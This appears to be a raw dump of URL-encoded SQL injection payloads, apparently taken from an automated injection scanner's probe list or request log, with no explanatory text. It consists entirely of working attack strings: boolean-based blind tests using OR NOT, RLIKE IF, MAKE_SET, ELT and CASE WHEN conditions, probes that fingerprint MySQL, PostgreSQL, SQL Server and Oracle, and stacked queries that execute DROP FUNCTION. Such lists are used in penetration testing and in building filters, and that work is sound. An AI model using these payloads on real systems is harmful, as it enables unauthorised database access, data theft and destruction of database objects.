-4011%22%29%29%20OR%20NOT%20%281376%3D4922%29--%20%20AND%20%28%28%22SdoK%22%3D%22SdoK -6798%22%29%29%20OR%20NOT%20%285756%3D5756%29--%20%20AND%20%28%28%22uZkT%22%3D%22uZkT -2422%22%29%29%20OR%20NOT%20%286435%3D4764%29--%20%20AND%20%28%28%22BzlD%22%3D%22BzlD -7982%22%29%29%29%20OR%20NOT%20%283076%3D9146%29--%20%20AND%20%28%28%28%22hiiz%22%3D%22hiiz -1388%22%29%29%29%20OR%20NOT%20%285756%3D5756%29--%20%20AND%20%28%28%28%22DvXe%22%3D%22DvXe -6271%22%29%29%29%20OR%20NOT%20%284671%3D5105%29--%20%20AND%20%28%28%28%22CSeK%22%3D%22CSeK -5326%22%20OR%20NOT%20%281603%3D8712%29--%20%20AND%20%22PvZh%22%3D%22PvZh -4146%22%20OR%20NOT%20%285756%3D5756%29--%20%20AND%20%22XPQo%22%3D%22XPQo -8968%22%20OR%20NOT%20%288982%3D3168%29--%20%20AND%20%22iJhI%22%3D%22iJhI -7925%22%29%20OR%20NOT%20%288603%3D5763%29--%20%20AND%20%28%22yuCY%22%20LIKE%20%22yuCY -6274%22%29%20OR%20NOT%20%285756%3D5756%29--%20%20AND%20%28%22pMyP%22%20LIKE%20%22pMyP -4215%22%29%20OR%20NOT%20%287281%3D7700%29--%20%20AND%20%28%22UcGW%22%20LIKE%20%22UcGW -7129%22%29%29%20OR%20NOT%20%285302%3D2659%29--%20%20AND%20%28%28%22MpqL%22%20LIKE%20%22MpqL -5713%22%29%29%20OR%20NOT%20%285756%3D5756%29--%20%20AND%20%28%28%22zCZA%22%20LIKE%20%22zCZA -3392%22%29%29%20OR%20NOT%20%288022%3D3539%29--%20%20AND%20%28%28%22Lxci%22%20LIKE%20%22Lxci -3935%22%29%29%29%20OR%20NOT%20%288806%3D5557%29--%20%20AND%20%28%28%28%22FDzT%22%20LIKE%20%22FDzT -4626%22%29%29%29%20OR%20NOT%20%285756%3D5756%29--%20%20AND%20%28%28%28%22ALAl%22%20LIKE%20%22ALAl -3315%22%29%29%29%20OR%20NOT%20%287875%3D5563%29--%20%20AND%20%28%28%28%22TXFz%22%20LIKE%20%22TXFz -4482%22%20OR%20NOT%20%285045%3D2364%29--%20%20AND%20%22HhKH%22%20LIKE%20%22HhKH -2429%22%20OR%20NOT%20%285756%3D5756%29--%20%20AND%20%22ncWC%22%20LIKE%20%22ncWC -8030%22%20OR%20NOT%20%282898%3D3091%29--%20%20AND%20%22tnXd%22%20LIKE%20%22tnXd -8095%29%20WHERE%202497%3D2497%20OR%20NOT%20%289365%3D5660%29--%20 -6881%29%20WHERE%205873%3D5873%20OR%20NOT%20%285756%3D5756%29--%20 -6782%29%20WHERE%201758%3D1758%20OR%20NOT%20%281399%3D1861%29--%20 -5866%27%29%20WHERE%204143%3D4143%20OR%20NOT%20%284465%3D1880%29--%20 -5065%27%29%20WHERE%201215%3D1215%20OR%20NOT%20%285756%3D5756%29--%20 -8107%27%29%20WHERE%206770%3D6770%20OR%20NOT%20%288005%3D3699%29--%20 -3433%27%20WHERE%204497%3D4497%20OR%20NOT%20%289156%3D5403%29--%20 -3921%27%20WHERE%205050%3D5050%20OR%20NOT%20%285756%3D5756%29--%20 -2406%27%20WHERE%201015%3D1015%20OR%20NOT%20%289819%3D5202%29--%20 -7561%22%20WHERE%201620%3D1620%20OR%20NOT%20%285109%3D8657%29--%20 -2273%22%20WHERE%203224%3D3224%20OR%20NOT%20%285756%3D5756%29--%20 -7906%22%20WHERE%205795%3D5795%20OR%20NOT%20%285053%3D9490%29--%20 1234.5%29%20RLIKE%20IF%281632%3D1632%2C1234.5%2C0x28%29 1234.5%29%20RLIKE%20IF%282424%3D2424%2C1234.5%2C0x28%29 1234.5%29%20RLIKE%20IF%283799%3D3799%2C1234.5%2C0x28%29 1234.5%27%29%20RLIKE%20IF%281185%3D1185%2C1234.5%2C0x28%29 1234.5%27%29%20RLIKE%20IF%282424%3D2424%2C1234.5%2C0x28%29 1234.5%27%29%20RLIKE%20IF%286523%3D6523%2C1234.5%2C0x28%29 1234.5%27%20RLIKE%20IF%283816%3D3816%2C1234.5%2C0x28%29 1234.5%27%20RLIKE%20IF%282424%3D2424%2C1234.5%2C0x28%29 1234.5%27%20RLIKE%20IF%283344%3D3344%2C1234.5%2C0x28%29 1234.5%22%20RLIKE%20IF%284001%3D4001%2C1234.5%2C0x28%29 1234.5%22%20RLIKE%20IF%282424%3D2424%2C1234.5%2C0x28%29 1234.5%22%20RLIKE%20IF%288344%3D8344%2C1234.5%2C0x28%29 1234.5%29%20RLIKE%20IF%286513%3D6513%2C1234.5%2C0x28%29%20AND%20%282695%3D2695 1234.5%29%20RLIKE%20IF%282424%3D2424%2C1234.5%2C0x28%29%20AND%20%285399%3D5399 1234.5%29%20RLIKE%20IF%283642%3D3642%2C1234.5%2C0x28%29%20AND%20%284678%3D4678 1234.5%29%29%20RLIKE%20IF%288890%3D8890%2C1234.5%2C0x28%29%20AND%20%28%289114%3D9114 1234.5%29%29%20RLIKE%20IF%282424%3D2424%2C1234.5%2C0x28%29%20AND%20%28%286037%3D6037 1234.5%29%29%20RLIKE%20IF%282946%3D2946%2C1234.5%2C0x28%29%20AND%20%28%282407%3D2407 1234.5%29%29%29%20RLIKE%20IF%287540%3D7540%2C1234.5%2C0x28%29%20AND%20%28%28%288597%3D8597 1234.5%29%29%29%20RLIKE%20IF%282424%3D2424%2C1234.5%2C0x28%29%20AND%20%28%28%283657%3D3657 1234.5%29%29%29%20RLIKE%20IF%283585%3D3585%2C1234.5%2C0x28%29%20AND%20%28%28%281794%3D1794 1234.5%20RLIKE%20IF%283407%3D3407%2C1234.5%2C0x28%29 1234.5%20RLIKE%20IF%282424%3D2424%2C1234.5%2C0x28%29 1234.5%20RLIKE%20IF%285932%3D5932%2C1234.5%2C0x28%29 1234.5%27%29%20RLIKE%20IF%286945%3D6945%2C1234.5%2C0x28%29%20AND%20%28%27ZOyf%27%3D%27ZOyf 1234.5%27%29%20RLIKE%20IF%282424%3D2424%2C1234.5%2C0x28%29%20AND%20%28%27JBDy%27%3D%27JBDy 1234.5%27%29%20RLIKE%20IF%289387%3D9387%2C1234.5%2C0x28%29%20AND%20%28%27ShAD%27%3D%27ShAD 1234.5%27%29%29%20RLIKE%20IF%283966%3D3966%2C1234.5%2C0x28%29%20AND%20%28%28%27LHyM%27%3D%27LHyM 1234.5%27%29%29%20RLIKE%20IF%282424%3D2424%2C1234.5%2C0x28%29%20AND%20%28%28%27wyYv%27%3D%27wyYv 1234.5%27%29%29%20RLIKE%20IF%288599%3D8599%2C1234.5%2C0x28%29%20AND%20%28%28%27shuY%27%3D%27shuY 1234.5%27%29%29%29%20RLIKE%20IF%287693%3D7693%2C1234.5%2C0x28%29%20AND%20%28%28%28%27LFLF%27%3D%27LFLF 1234.5%27%29%29%29%20RLIKE%20IF%282424%3D2424%2C1234.5%2C0x28%29%20AND%20%28%28%28%27OGsS%27%3D%27OGsS 1234.5%27%29%29%29%20RLIKE%20IF%284016%3D4016%2C1234.5%2C0x28%29%20AND%20%28%28%28%27FiGj%27%3D%27FiGj 1234.5%27%20RLIKE%20IF%287810%3D7810%2C1234.5%2C0x28%29%20AND%20%27ajlj%27%3D%27ajlj 1234.5%27%20RLIKE%20IF%282424%3D2424%2C1234.5%2C0x28%29%20AND%20%27CYXL%27%3D%27CYXL 1234.5%27%20RLIKE%20IF%285972%3D5972%2C1234.5%2C0x28%29%20AND%20%27atJg%27%3D%27atJg 1234.5%27%29%20RLIKE%20IF%285831%3D5831%2C1234.5%2C0x28%29%20AND%20%28%27rkqJ%27%20LIKE%20%27rkqJ 1234.5%27%29%20RLIKE%20IF%282424%3D2424%2C1234.5%2C0x28%29%20AND%20%28%27Bqmy%27%20LIKE%20%27Bqmy 1234.5%27%29%20RLIKE%20IF%281452%3D1452%2C1234.5%2C0x28%29%20AND%20%28%27CodG%27%20LIKE%20%27CodG 1234.5%27%29%29%20RLIKE%20IF%287938%3D7938%2C1234.5%2C0x28%29%20AND%20%28%28%27XaFp%27%20LIKE%20%27XaFp 1234.5%27%29%29%20RLIKE%20IF%282424%3D2424%2C1234.5%2C0x28%29%20AND%20%28%28%27pjIT%27%20LIKE%20%27pjIT 1234.5%27%29%29%20RLIKE%20IF%281910%3D1910%2C1234.5%2C0x28%29%20AND%20%28%28%27XaTd%27%20LIKE%20%27XaTd 1234.5%27%29%29%29%20RLIKE%20IF%281675%3D1675%2C1234.5%2C0x28%29%20AND%20%28%28%28%27JZer%27%20LIKE%20%27JZer 1234.5%27%29%29%29%20RLIKE%20IF%282424%3D2424%2C1234.5%2C0x28%29%20AND%20%28%28%28%27NhQz%27%20LIKE%20%27NhQz 1234.5%27%29%29%29%20RLIKE%20IF%284974%3D4974%2C1234.5%2C0x28%29%20AND%20%28%28%28%27HpnZ%27%20LIKE%20%27HpnZ 1234.5%27%20RLIKE%20IF%286830%3D6830%2C1234.5%2C0x28%29%20AND%20%27xKex%27%20LIKE%20%27xKex 1234.5%27%20RLIKE%20IF%282424%3D2424%2C1234.5%2C0x28%29%20AND%20%27SSsS%27%20LIKE%20%27SSsS 1234.5%27%20RLIKE%20IF%282517%3D2517%2C1234.5%2C0x28%29%20AND%20%27rVpo%27%20LIKE%20%27rVpo 1234.5%22%29%20RLIKE%20IF%284258%3D4258%2C1234.5%2C0x28%29%20AND%20%28%22QCHI%22%3D%22QCHI 1234.5%22%29%20RLIKE%20IF%282424%3D2424%2C1234.5%2C0x28%29%20AND%20%28%22TuYY%22%3D%22TuYY 1234.5%22%29%20RLIKE%20IF%282476%3D2476%2C1234.5%2C0x28%29%20AND%20%28%22UEQT%22%3D%22UEQT 1234.5%22%29%29%20RLIKE%20IF%284008%3D4008%2C1234.5%2C0x28%29%20AND%20%28%28%22pehf%22%3D%22pehf 1234.5%22%29%29%20RLIKE%20IF%282424%3D2424%2C1234.5%2C0x28%29%20AND%20%28%28%22AGvi%22%3D%22AGvi 1234.5%22%29%29%20RLIKE%20IF%282494%3D2494%2C1234.5%2C0x28%29%20AND%20%28%28%22PgIb%22%3D%22PgIb 1234.5%22%29%29%29%20RLIKE%20IF%284656%3D4656%2C1234.5%2C0x28%29%20AND%20%28%28%28%22nRAN%22%3D%22nRAN 1234.5%22%29%29%29%20RLIKE%20IF%282424%3D2424%2C1234.5%2C0x28%29%20AND%20%28%28%28%22HSnB%22%3D%22HSnB 1234.5%22%29%29%29%20RLIKE%20IF%289362%3D9362%2C1234.5%2C0x28%29%20AND%20%28%28%28%22VnQd%22%3D%22VnQd 1234.5%22%20RLIKE%20IF%283834%3D3834%2C1234.5%2C0x28%29%20AND%20%22TsmR%22%3D%22TsmR 1234.5%22%20RLIKE%20IF%282424%3D2424%2C1234.5%2C0x28%29%20AND%20%22aavZ%22%3D%22aavZ 1234.5%22%20RLIKE%20IF%289583%3D9583%2C1234.5%2C0x28%29%20AND%20%22suOL%22%3D%22suOL 1234.5%22%29%20RLIKE%20IF%281048%3D1048%2C1234.5%2C0x28%29%20AND%20%28%22xXBi%22%20LIKE%20%22xXBi 1234.5%22%29%20RLIKE%20IF%282424%3D2424%2C1234.5%2C0x28%29%20AND%20%28%22bLDW%22%20LIKE%20%22bLDW 1234.5%22%29%20RLIKE%20IF%285414%3D5414%2C1234.5%2C0x28%29%20AND%20%28%22NcQa%22%20LIKE%20%22NcQa 1234.5%22%29%29%20RLIKE%20IF%287251%3D7251%2C1234.5%2C0x28%29%20AND%20%28%28%22jUKv%22%20LIKE%20%22jUKv 1234.5%22%29%29%20RLIKE%20IF%282424%3D2424%2C1234.5%2C0x28%29%20AND%20%28%28%22TYCs%22%20LIKE%20%22TYCs 1234.5%22%29%29%20RLIKE%20IF%286347%3D6347%2C1234.5%2C0x28%29%20AND%20%28%28%22rzTk%22%20LIKE%20%22rzTk 1234.5%22%29%29%29%20RLIKE%20IF%287039%3D7039%2C1234.5%2C0x28%29%20AND%20%28%28%28%22AqWW%22%20LIKE%20%22AqWW 1234.5%22%29%29%29%20RLIKE%20IF%282424%3D2424%2C1234.5%2C0x28%29%20AND%20%28%28%28%22MtOb%22%20LIKE%20%22MtOb 1234.5%22%29%29%29%20RLIKE%20IF%286584%3D6584%2C1234.5%2C0x28%29%20AND%20%28%28%28%22OLAL%22%20LIKE%20%22OLAL 1234.5%22%20RLIKE%20IF%284778%3D4778%2C1234.5%2C0x28%29%20AND%20%22OjFv%22%20LIKE%20%22OjFv 1234.5%22%20RLIKE%20IF%282424%3D2424%2C1234.5%2C0x28%29%20AND%20%22Wcdd%22%20LIKE%20%22Wcdd 1234.5%22%20RLIKE%20IF%285903%3D5903%2C1234.5%2C0x28%29%20AND%20%22EOgZ%22%20LIKE%20%22EOgZ 1234.5%29%20WHERE%201872%3D1872%20RLIKE%20IF%282547%3D2547%2C1234.5%2C0x28%29 1234.5%29%20WHERE%203231%3D3231%20RLIKE%20IF%282424%3D2424%2C1234.5%2C0x28%29 1234.5%29%20WHERE%202682%3D2682%20RLIKE%20IF%289843%3D9843%2C1234.5%2C0x28%29 1234.5%27%29%20WHERE%209781%3D9781%20RLIKE%20IF%285980%3D5980%2C1234.5%2C0x28%29 1234.5%27%29%20WHERE%202103%3D2103%20RLIKE%20IF%282424%3D2424%2C1234.5%2C0x28%29 1234.5%27%29%20WHERE%208188%3D8188%20RLIKE%20IF%286232%3D6232%2C1234.5%2C0x28%29 1234.5%27%20WHERE%209765%3D9765%20RLIKE%20IF%289263%3D9263%2C1234.5%2C0x28%29 1234.5%27%20WHERE%209641%3D9641%20RLIKE%20IF%282424%3D2424%2C1234.5%2C0x28%29 1234.5%27%20WHERE%206887%3D6887%20RLIKE%20IF%283864%3D3864%2C1234.5%2C0x28%29 1234.5%22%20WHERE%203620%3D3620%20RLIKE%20IF%283992%3D3992%2C1234.5%2C0x28%29 1234.5%22%20WHERE%203111%3D3111%20RLIKE%20IF%282424%3D2424%2C1234.5%2C0x28%29 1234.5%22%20WHERE%201804%3D1804%20RLIKE%20IF%289673%3D9673%2C1234.5%2C0x28%29 1234.5%27%20%7C%7C%20%28SELECT%202709%20FROM%20DUAL%20WHERE%204221%3D4221%20RLIKE%20IF%286284%3D6284%2C1234.5%2C0x28%29%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209665%20FROM%20DUAL%20WHERE%206653%3D6653%20RLIKE%20IF%282424%3D2424%2C1234.5%2C0x28%29%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204910%20FROM%20DUAL%20WHERE%202643%3D2643%20RLIKE%20IF%283095%3D3095%2C1234.5%2C0x28%29%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%206669%20WHERE%209463%3D9463%20RLIKE%20IF%285596%3D5596%2C1234.5%2C0x28%29%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204922%20WHERE%204168%3D4168%20RLIKE%20IF%282424%3D2424%2C1234.5%2C0x28%29%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%206689%20WHERE%208298%3D8298%20RLIKE%20IF%283778%3D3778%2C1234.5%2C0x28%29%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%202279%20FROM%20DUAL%20WHERE%209148%3D9148%20RLIKE%20IF%281146%3D1146%2C1234.5%2C0x28%29%20%29 1234.5%20%2B%20%28SELECT%203022%20FROM%20DUAL%20WHERE%203421%3D3421%20RLIKE%20IF%282424%3D2424%2C1234.5%2C0x28%29%20%29 1234.5%20%2B%20%28SELECT%209800%20FROM%20DUAL%20WHERE%203411%3D3411%20RLIKE%20IF%284139%3D4139%2C1234.5%2C0x28%29%20%29 1234.5%20%2B%20%28SELECT%207278%20WHERE%201440%3D1440%20RLIKE%20IF%285791%3D5791%2C1234.5%2C0x28%29%20%29 1234.5%20%2B%20%28SELECT%209264%20WHERE%208048%3D8048%20RLIKE%20IF%282424%3D2424%2C1234.5%2C0x28%29%20%29 1234.5%20%2B%20%28SELECT%207576%20WHERE%206891%3D6891%20RLIKE%20IF%286091%3D6091%2C1234.5%2C0x28%29%20%29 1234.5%27%20%2B%20%28SELECT%20%27cPdb%27%20FROM%20DUAL%20WHERE%203397%3D3397%20RLIKE%20IF%285969%3D5969%2C1234.5%2C0x28%29%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27UIYB%27%20FROM%20DUAL%20WHERE%207644%3D7644%20RLIKE%20IF%282424%3D2424%2C1234.5%2C0x28%29%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27RocE%27%20FROM%20DUAL%20WHERE%204855%3D4855%20RLIKE%20IF%286251%3D6251%2C1234.5%2C0x28%29%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27ysnT%27%20WHERE%205383%3D5383%20RLIKE%20IF%285181%3D5181%2C1234.5%2C0x28%29%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27FWvm%27%20WHERE%207511%3D7511%20RLIKE%20IF%282424%3D2424%2C1234.5%2C0x28%29%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27otem%27%20WHERE%204401%3D4401%20RLIKE%20IF%285152%3D5152%2C1234.5%2C0x28%29%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20RLIKE%20IF%289733%3D9733%2C1234.5%2C0x28%29%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20RLIKE%20IF%282424%3D2424%2C1234.5%2C0x28%29%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20RLIKE%20IF%284745%3D4745%2C1234.5%2C0x28%29%20%23 %28SELECT%20%28CASE%20WHEN%20%283055%3D7375%29%20THEN%201234.5%20ELSE%201%2F%28SELECT%200%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%286410%3D6410%29%20THEN%201234.5%20ELSE%201%2F%28SELECT%200%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%286298%3D5268%29%20THEN%201234.5%20ELSE%201%2F%28SELECT%200%29%20END%29%29 MAKE_SET%286122%3D4972%2C1234.5%29 MAKE_SET%282696%3D2696%2C1234.5%29 MAKE_SET%284689%3D7732%2C1234.5%29 ELT%281053%3D1263%2C1234.5%29 ELT%282685%3D2685%2C1234.5%29 ELT%283559%3D5599%2C1234.5%29 %285159%3D1787%29%2A1234.5 %284775%3D4775%29%2A1234.5 %282660%3D4304%29%2A1234.5 %28SELECT%20%28CASE%20WHEN%20%281655%3D8567%29%20THEN%201234.5%20ELSE%201655%2A%28SELECT%201655%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%289112%3D9112%29%20THEN%201234.5%20ELSE%209112%2A%28SELECT%209112%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%284273%3D3900%29%20THEN%201234.5%20ELSE%204273%2A%28SELECT%204273%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%281284%3D6182%29%20THEN%201234.5%20ELSE%201284%2A%28SELECT%201284%20FROM%20mysql.db%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%282366%3D2366%29%20THEN%201234.5%20ELSE%202366%2A%28SELECT%202366%20FROM%20mysql.db%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%289758%3D3746%29%20THEN%201234.5%20ELSE%209758%2A%28SELECT%209758%20FROM%20mysql.db%29%20END%29%29 %28SELECT%20GENERATE_SERIES%281234.5%2C1234.5%2CCASE%20WHEN%20%285096%3D6164%29%20THEN%201%20ELSE%200%20END%29%20LIMIT%201%29 %28SELECT%20GENERATE_SERIES%281234.5%2C1234.5%2CCASE%20WHEN%20%287441%3D7441%29%20THEN%201%20ELSE%200%20END%29%20LIMIT%201%29 %28SELECT%20GENERATE_SERIES%281234.5%2C1234.5%2CCASE%20WHEN%20%286544%3D8999%29%20THEN%201%20ELSE%200%20END%29%20LIMIT%201%29 %28SELECT%20%28CASE%20WHEN%20%281780%3D6553%29%20THEN%201234.5%20ELSE%201780%2A%28SELECT%201780%20FROM%20master..sysdatabases%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%281468%3D1468%29%20THEN%201234.5%20ELSE%201468%2A%28SELECT%201468%20FROM%20master..sysdatabases%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%286036%3D5694%29%20THEN%201234.5%20ELSE%206036%2A%28SELECT%206036%20FROM%20master..sysdatabases%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%284478%3D5919%29%20THEN%201234.5%20ELSE%201%2F%28SELECT%200%20FROM%20DUAL%29%20END%29%20FROM%20DUAL%29 %28SELECT%20%28CASE%20WHEN%20%288099%3D8099%29%20THEN%201234.5%20ELSE%201%2F%28SELECT%200%20FROM%20DUAL%29%20END%29%20FROM%20DUAL%29 %28SELECT%20%28CASE%20WHEN%20%287086%3D7979%29%20THEN%201234.5%20ELSE%201%2F%28SELECT%200%20FROM%20DUAL%29%20END%29%20FROM%20DUAL%29 IIF%282283%3D6330%2C1234.5%2C1%2F0%29 IIF%286575%3D6575%2C1234.5%2C1%2F0%29 IIF%284879%3D3142%2C1234.5%2C1%2F0%29 %28CASE%20WHEN%206661%3D5343%20THEN%201234.5%20ELSE%20NULL%20END%29 %28CASE%20WHEN%203720%3D3720%20THEN%201234.5%20ELSE%20NULL%20END%29 %28CASE%20WHEN%204849%3D3026%20THEN%201234.5%20ELSE%20NULL%20END%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%286379%3D3899%29%20THEN%201%20ELSE%201%2F%28SELECT%200%29%20END%29%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%285891%3D5891%29%20THEN%201%20ELSE%201%2F%28SELECT%200%29%20END%29%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%283041%3D5421%29%20THEN%201%20ELSE%201%2F%28SELECT%200%29%20END%29%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%289206%3D1299%29%20THEN%201234.5%20ELSE%201%2F%28SELECT%200%29%20END%29%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%281462%3D1462%29%20THEN%201234.5%20ELSE%201%2F%28SELECT%200%29%20END%29%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%289118%3D1114%29%20THEN%201234.5%20ELSE%201%2F%28SELECT%200%29%20END%29%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%283592%3D5740%29%20THEN%201234.5%20ELSE%203592%2A%28SELECT%203592%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%282090%3D2090%29%20THEN%201234.5%20ELSE%202090%2A%28SELECT%202090%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%287101%3D4461%29%20THEN%201234.5%20ELSE%207101%2A%28SELECT%207101%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%284488%3D9236%29%20THEN%201234.5%20ELSE%204488%2A%28SELECT%204488%20FROM%20mysql.db%29%20END%29%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%285061%3D5061%29%20THEN%201234.5%20ELSE%205061%2A%28SELECT%205061%20FROM%20mysql.db%29%20END%29%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%288966%3D2345%29%20THEN%201234.5%20ELSE%208966%2A%28SELECT%208966%20FROM%20mysql.db%29%20END%29%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%287185%3D9180%29%20THEN%201234.5%20ELSE%207185%2A%28SELECT%207185%20FROM%20master..sysdatabases%29%20END%29%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%283407%3D3407%29%20THEN%201234.5%20ELSE%203407%2A%28SELECT%203407%20FROM%20master..sysdatabases%29%20END%29%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%286785%3D9620%29%20THEN%201234.5%20ELSE%206785%2A%28SELECT%206785%20FROM%20master..sysdatabases%29%20END%29%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%288625%3D2539%29%20THEN%201234.5%20ELSE%201%2F%28SELECT%200%20FROM%20DUAL%29%20END%29%20FROM%20DUAL%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%285585%3D5585%29%20THEN%201234.5%20ELSE%201%2F%28SELECT%200%20FROM%20DUAL%29%20END%29%20FROM%20DUAL%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%286446%3D2289%29%20THEN%201234.5%20ELSE%201%2F%28SELECT%200%20FROM%20DUAL%29%20END%29%20FROM%20DUAL%29 1234.5%2CIIF%286697%3D5246%2C1234.5%2C1%2F0%29 1234.5%2CIIF%288476%3D8476%2C1234.5%2C1%2F0%29 1234.5%2CIIF%282628%3D1982%2C1234.5%2C1%2F0%29 1234.5%29%3B%20IF%28%284064%3D9383%29%2CSELECT%204064%2CDROP%20FUNCTION%20lWKp%29%3B%23 1234.5%29%3B%20IF%28%286233%3D6233%29%2CSELECT%206233%2CDROP%20FUNCTION%20looX%29%3B%23 1234.5%29%3B%20IF%28%284058%3D3634%29%2CSELECT%204058%2CDROP%20FUNCTION%20cfGK%29%3B%23 1234.5%27%29%3B%20IF%28%287534%3D6820%29%2CSELECT%207534%2CDROP%20FUNCTION%20Ipln%29%3B%23 1234.5%27%29%3B%20IF%28%286233%3D6233%29%2CSELECT%206233%2CDROP%20FUNCTION%20looX%29%3B%23 1234.5%27%29%3B%20IF%28%288165%3D3954%29%2CSELECT%208165%2CDROP%20FUNCTION%20Bddd%29%3B%23 1234.5%27%3B%20IF%28%288566%3D5106%29%2CSELECT%208566%2CDROP%20FUNCTION%20gEQI%29%3B%23 1234.5%27%3B%20IF%28%286233%3D6233%29%2CSELECT%206233%2CDROP%20FUNCTION%20looX%29%3B%23 1234.5%27%3B%20IF%28%287661%3D5751%29%2CSELECT%207661%2CDROP%20FUNCTION%20Pjna%29%3B%23 1234.5%22%3B%20IF%28%284722%3D5864%29%2CSELECT%204722%2CDROP%20FUNCTION%20jAAv%29%3B%23 1234.5%22%3B%20IF%28%286233%3D6233%29%2CSELECT%206233%2CDROP%20FUNCTION%20looX%29%3B%23 1234.5%22%3B%20IF%28%283265%3D6102%29%2CSELECT%203265%2CDROP%20FUNCTION%20HCst%29%3B%23 1234.5%29%3B%20IF%28%288310%3D3780%29%2CSELECT%208310%2CDROP%20FUNCTION%20QQXw%29%3B%23%20AND%20%289181%3D9181 1234.5%29%3B%20IF%28%286233%3D6233%29%2CSELECT%206233%2CDROP%20FUNCTION%20looX%29%3B%23%20AND%20%282453%3D2453 1234.5%29%3B%20IF%28%283663%3D3159%29%2CSELECT%203663%2CDROP%20FUNCTION%20MoqE%29%3B%23%20AND%20%287142%3D7142 1234.5%29%29%3B%20IF%28%284557%3D1308%29%2CSELECT%204557%2CDROP%20FUNCTION%20KxOx%29%3B%23%20AND%20%28%288010%3D8010 1234.5%29%29%3B%20IF%28%286233%3D6233%29%2CSELECT%206233%2CDROP%20FUNCTION%20looX%29%3B%23%20AND%20%28%287215%3D7215 1234.5%29%29%3B%20IF%28%286536%3D8778%29%2CSELECT%206536%2CDROP%20FUNCTION%20Axls%29%3B%23%20AND%20%28%285966%3D5966 1234.5%29%29%29%3B%20IF%28%288495%3D8643%29%2CSELECT%208495%2CDROP%20FUNCTION%20ylur%29%3B%23%20AND%20%28%28%283563%3D3563 1234.5%29%29%29%3B%20IF%28%286233%3D6233%29%2CSELECT%206233%2CDROP%20FUNCTION%20looX%29%3B%23%20AND%20%28%28%282513%3D2513 1234.5%29%29%29%3B%20IF%28%281395%3D6060%29%2CSELECT%201395%2CDROP%20FUNCTION%20BtRN%29%3B%23%20AND%20%28%28%283845%3D3845 1234.5%3B%20IF%28%281534%3D8840%29%2CSELECT%201534%2CDROP%20FUNCTION%20NmEH%29%3B%23 1234.5%3B%20IF%28%286233%3D6233%29%2CSELECT%206233%2CDROP%20FUNCTION%20looX%29%3B%23 1234.5%3B%20IF%28%282891%3D9768%29%2CSELECT%202891%2CDROP%20FUNCTION%20wjIa%29%3B%23 1234.5%27%29%3B%20IF%28%283709%3D6756%29%2CSELECT%203709%2CDROP%20FUNCTION%20WJku%29%3B%23%20AND%20%28%27XTqV%27%3D%27XTqV 1234.5%27%29%3B%20IF%28%286233%3D6233%29%2CSELECT%206233%2CDROP%20FUNCTION%20looX%29%3B%23%20AND%20%28%27eooG%27%3D%27eooG 1234.5%27%29%3B%20IF%28%282554%3D3994%29%2CSELECT%202554%2CDROP%20FUNCTION%20mHmT%29%3B%23%20AND%20%28%27sMby%27%3D%27sMby 1234.5%27%29%29%3B%20IF%28%282812%3D3723%29%2CSELECT%202812%2CDROP%20FUNCTION%20kUIv%29%3B%23%20AND%20%28%28%27FpHw%27%3D%27FpHw 1234.5%27%29%29%3B%20IF%28%286233%3D6233%29%2CSELECT%206233%2CDROP%20FUNCTION%20looX%29%3B%23%20AND%20%28%28%27LEBH%27%3D%27LEBH 1234.5%27%29%29%3B%20IF%28%282835%3D7485%29%2CSELECT%202835%2CDROP%20FUNCTION%20EEPw%29%3B%23%20AND%20%28%28%27dtRR%27%3D%27dtRR 1234.5%27%29%29%29%3B%20IF%28%288331%3D8704%29%2CSELECT%208331%2CDROP%20FUNCTION%20zwlO%29%3B%23%20AND%20%28%28%28%27Xjde%27%3D%27Xjde 